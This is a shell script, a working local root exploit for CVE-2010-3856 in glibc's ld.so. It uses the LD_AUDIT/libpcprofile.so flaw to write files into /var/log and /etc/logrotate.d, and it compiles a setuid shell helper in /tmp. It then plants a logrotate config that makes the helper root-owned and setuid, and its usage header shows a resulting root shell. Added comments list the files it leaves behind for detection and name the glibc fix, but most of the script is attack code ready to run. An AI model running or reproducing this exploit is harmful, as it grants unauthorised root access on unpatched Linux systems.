#!/bin/sh

#
# $Id: raptor_ldaudit2,v 1.2 2011/02/04 11:05:15 raptor Exp $
#
# raptor_ldaudit2 - another glibc ld.so exploit (logrotate)
# Copyright (c) 2010 Marco Ivaldi <raptor@mediaservice.net>
#
# Property of @ Mediaservice.net Srl Data Security Division
# http://www.mediaservice.net/ http://lab.mediaservice.net/
#
# ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x 
# before 2.12.2, does not properly restrict use of the LD_AUDIT environment 
# variable to reference dynamic shared objects (DSOs) as audit objects, which 
# allows local users to gain privileges by leveraging an unsafe DSO located in 
# a trusted library directory, as demonstrated by libpcprofile.so 
# (CVE-2010-3856).
#
# "Suit up. Score chicks. Be awesome." -- Barney Stinson
#
# This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben 
# Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344
#
# This exploit uses the logrotate attack vector. See also the cron.d version
# available at: http://www.0xdeadbeef.info/exploit/raptor_ldaudit
#
# Usage:
# $ chmod +x raptor_ldaudit2
# $ ./raptor_ldaudit2
# [...]
# Everything looks fine.
# Just wait until logrotate is run and check /tmp/pwned.
# [...]
# $ /tmp/pwned 
# sh-4.1# id
# uid=0(root) gid=0(root) groups=0(root),100(users)
# sh-4.1# 
# [don't forget to delete /tmp/pwned* and /var/log/runme*!]
# 
# Vulnerable platforms:
# Slackware 13.1	[tested]
# openSUSE 11.3		[untested]
# Fedora Core 13	[untested]
# RHEL/CentOS 5		[untested]
# Ubuntu 10		[untested]
# [...]
#

# Flat script, no functions: it runs top to bottom and exits 1 at either of the
# two failure checks below. Everything else is left to a later logrotate run.
#
# Artifacts this script writes (fixed paths, useful for detection and cleanup):
#   /tmp/pwned.c, /tmp/pwned   - C source and binary of the setuid shell helper
#   /var/log/runme             - "fake log" created through LD_AUDIT/libpcprofile
#   /etc/logrotate.d/runme     - logrotate config carrying the firstaction script
# Only /etc/logrotate.d/runme removes itself (see the firstaction line below);
# the header already warns that /tmp/pwned* and /var/log/runme* stay behind.
#
# Mitigation: the header's CVE-2010-3856 text says ld.so before 2.11.3 and
# 2.12.x before 2.12.2 is affected, so upgrading glibc past those versions
# restricts LD_AUDIT and removes this vector.
echo "raptor_ldaudit2 - another glibc ld.so exploit (logrotate)"
echo "Copyright (c) 2010 Marco Ivaldi <raptor@mediaservice.net>"
echo

# prepare setuid shell helper to circumvent bash checks
# The helper is a one-liner that calls setuid(0) and setgid(0) and then
# system("/bin/sh"); it only becomes useful once the logrotate step below
# has made it root-owned and setuid (chmod 4755). Note the predictable
# /tmp path, which is what an on-disk check would look for.
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c
# Abort if gcc failed; nothing has touched /var/log or /etc yet at this point.
if [ $? -ne 0 ]; then
	echo "Error: Problems compiling setuid shell helper, check your gcc."
	exit 1
fi

# create a fake log file in /var/log
# ping is just the carrier process here: with LD_AUDIT set to libpcprofile.so
# the profiling output file named by PCPROFILE_OUTPUT is created on startup.
# ping's stderr is discarded, so any complaint from it is not shown.
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/var/log/runme" ping 2>/dev/null

# do the magic!
runme="/etc/logrotate.d/runme"
# umask 0 clears all permission bits from the mask, so files created from
# here on get the full mode the creator asks for (the script relies on being
# able to write $runme again further down).
umask 0
# Same LD_AUDIT trick, this time aimed at the logrotate.d directory.
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null
# Vulnerability check: if $runme could not be created (or is empty), the
# LD_AUDIT restriction is in place or the vector does not apply. cat's
# stderr is silenced so a missing file just yields the empty string.
if [ "`cat $runme 2>/dev/null`" = "" ]; then
	echo "Error: Not vulnerable or wrong attack vector? See comments."
	exit 1
fi

# build the logrotate script
# Overwrites $runme with a config for /var/log/runme. "daily" and "size=0"
# make it eligible at the next run; the firstaction script is what matters:
# it chowns and chmods the helper to 4755 and then deletes this config
# ("rm -f $runme" is expanded now, so the literal path is written). Per the
# usage header, logrotate is expected to execute this as root. The other
# artifacts listed at the top are not removed by it.
echo "/var/log/runme {"						>  $runme
echo "daily"							>> $runme
echo "size=0"							>> $runme
echo "firstaction"						>> $runme
echo "chown root /tmp/pwned;chmod 4755 /tmp/pwned;rm -f $runme"	>> $runme
echo "endscript"						>> $runme
echo "}"							>> $runme

# legen -- wait for it -- dary!
# No further action; the outcome depends on when logrotate next runs.
echo "Everything looks fine."
echo "Just wait until logrotate is run and check /tmp/pwned."
